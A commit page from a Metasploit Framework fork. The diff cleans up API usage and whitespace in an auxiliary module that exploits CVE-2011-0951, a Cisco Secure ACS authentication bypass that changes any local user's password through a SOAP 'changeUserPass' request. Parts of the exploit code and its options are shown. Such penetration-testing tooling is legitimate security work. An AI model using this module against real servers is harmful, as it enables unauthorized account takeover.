dnrops
/
metasploit-framework
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

Make changes to proper API usage, whitespace, and extra characters.

This commit is contained in:
sinn3r 2012-05-15 01:26:42 -05:00
parent 3c683fcf99
commit 8b06835109
1 changed files with 14 additions and 14 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

28
modules/auxiliary/admin/cisco/cisco_secure_acs_bypass.rb
View File

@ -17,28 +17,28 @@ class Metasploit4 < Msf::Auxiliary
include Msf::Auxiliary::Report include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner include Msf::Auxiliary::Scanner
def initialize def initialize(info = {})
super( super(update_info(info,
'Name' => 'Cisco Secure ACS Version < 5.1.0.44.5 or 5.2.0.26.2 and Unauthorized Password Change', 'Name' => 'Cisco Secure ACS Version < 5.1.0.44.5 or 5.2.0.26.2 Unauthorized Password Change',
'Version' => '$Revision$', 'Version' => '$Revision$',
'Description' => %q{ 'Description' => %q{
This module exploits an authentication bypass issue which allows arbitrary This module exploits an authentication bypass issue which allows arbitrary
password change requests to be issued for any user in the local store. password change requests to be issued for any user in the local store.
Instances of Secure ACS running version 5.1 with patches 3, 4, or 5 as well Instances of Secure ACS running version 5.1 with patches 3, 4, or 5 as well
as version 5.2 with either no patches or patches 1 and 2 are vulnerable. as version 5.2 with either no patches or patches 1 and 2 are vulnerable.
}, },
'References' => 'References' =>
[ [
['BID', '47093'], ['BID', '47093'],
['CVE', 'CVE-2011-0951'], ['CVE', 'CVE-2011-0951'],
['URL', 'http://www.cisco.com/en/US/products/csa/cisco-sa-20110330-acs.html'], ['URL', 'http://www.cisco.com/en/US/products/csa/cisco-sa-20110330-acs.html']
], ],
'Author' => 'Author' =>
[ [
'Jason Kratzer<pyoor[at]flinkd.org>', 'Jason Kratzer<pyoor[at]flinkd.org>'
], ],
'License' => MSF_LICENSE 'License' => MSF_LICENSE
) ))
register_options( register_options(
[ [
@ -46,7 +46,7 @@ class Metasploit4 < Msf::Auxiliary
OptString.new('TARGETURI', [true, 'Path to UCP WebService', '/PI/services/UCP/']), OptString.new('TARGETURI', [true, 'Path to UCP WebService', '/PI/services/UCP/']),
OptString.new('USERNAME', [true, 'Username to use', '']), OptString.new('USERNAME', [true, 'Username to use', '']),
OptString.new('PASSWORD', [true, 'Password to use', '']), OptString.new('PASSWORD', [true, 'Password to use', '']),
OptBool.new('SSL', [true, 'Use SSL', true],), OptBool.new('SSL', [true, 'Use SSL', true],)
], self.class) ], self.class)
end end
@ -80,12 +80,12 @@ class Metasploit4 < Msf::Auxiliary
begin begin
res = send_request_cgi({ res = send_request_cgi({
'uri' => "#{datastore['TARGETURI']}", 'uri' => target_uri.path,
'method' => 'POST', 'method' => 'POST',
'data' => data, 'data' => data,
'headers' => 'headers' =>
{ {
'SOAPAction' => '"changeUserPass"', 'SOAPAction' => '"changeUserPass"',
} }
}, 60) }, 60)
@ -112,7 +112,7 @@ class Metasploit4 < Msf::Auxiliary
end end
else else
print_error("#{rhost} - Failed! The webserver issued a #{res.code} response.") print_error("#{rhost} - Failed! The webserver issued a #{res.code} response.")
print_error("Please validate the TARGETURI and try again.") print_error("Please validate the TARGETURI option and try again.")
end end
end end